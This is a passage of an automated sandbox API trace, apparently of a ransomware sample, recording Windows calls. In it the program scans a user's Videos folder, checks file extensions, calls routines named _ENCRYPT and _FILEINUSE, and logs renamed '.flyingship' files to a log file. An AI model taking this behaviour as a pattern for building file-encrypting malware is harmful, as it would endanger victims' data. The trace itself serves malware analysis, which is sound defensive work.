dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0194.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0194.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0194.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.483] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.483] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.483] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.483] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.483] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0194.483] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.483] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0194.483] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.483] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0194.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0194.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0194.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0194.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.484] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0194.484] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3614, lpOverlapped=0x0) returned 1 [0194.484] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0194.484] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3614, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.484] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0194.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0194.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0194.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0194.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.flyingship.avi\r\n", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0194.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d) returned 0x9238c0 [0194.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.flyingship.avi\r\n", cchWideChar=77, lpMultiByteStr=0x9238c0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 77 [0194.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0194.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0194.485] WriteFile (in: hFile=0x160, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4c, lpOverlapped=0x0) returned 1 [0194.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0194.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.485] CloseHandle (hObject=0x160) returned 1 [0194.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0194.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0194.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0194.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0194.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0194.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0194.487] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.487] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.487] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.487] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.487] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0194.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0194.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0194.487] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0194.487] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0194.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0194.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0194.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0194.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0194.487] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0194.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0194.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0194.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0194.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0194.488] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0194.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0194.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0194.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd4c8 [0194.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd4c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0194.488] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\-4jytdy7dtgq 7n_rha.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0194.489] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.489] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0194.489] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0194.489] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0194.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0194.490] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0194.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba180 [0194.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba180, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0194.490] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.490] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0194.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0194.490] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0194.491] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0194.491] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0194.491] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0194.491] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0194.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.491] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0194.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0194.492] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0194.492] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0194.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0194.492] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d91460, ftCreationTime.dwHighDateTime=0x1d5e6a1, ftLastAccessTime.dwLowDateTime=0x45eed560, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x45eed560, ftLastWriteTime.dwHighDateTime=0x1d5e2d1, nFileSizeHigh=0x0, nFileSizeLow=0x1418f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="-4jYTdy7DTgQ 7n_RHA.swf", cAlternateFileName="-4JYTD~1.SWF")) returned 0x90add8 [0194.492] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0194.492] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0194.493] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d91460, ftCreationTime.dwHighDateTime=0x1d5e6a1, ftLastAccessTime.dwLowDateTime=0x45eed560, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x45eed560, ftLastWriteTime.dwHighDateTime=0x1d5e2d1, nFileSizeHigh=0x0, nFileSizeLow=0x1418f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="-4jYTdy7DTgQ 7n_RHA.swf", cAlternateFileName="-4JYTD~1.SWF")) returned 0x90add8 [0194.493] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0194.493] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0194.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", 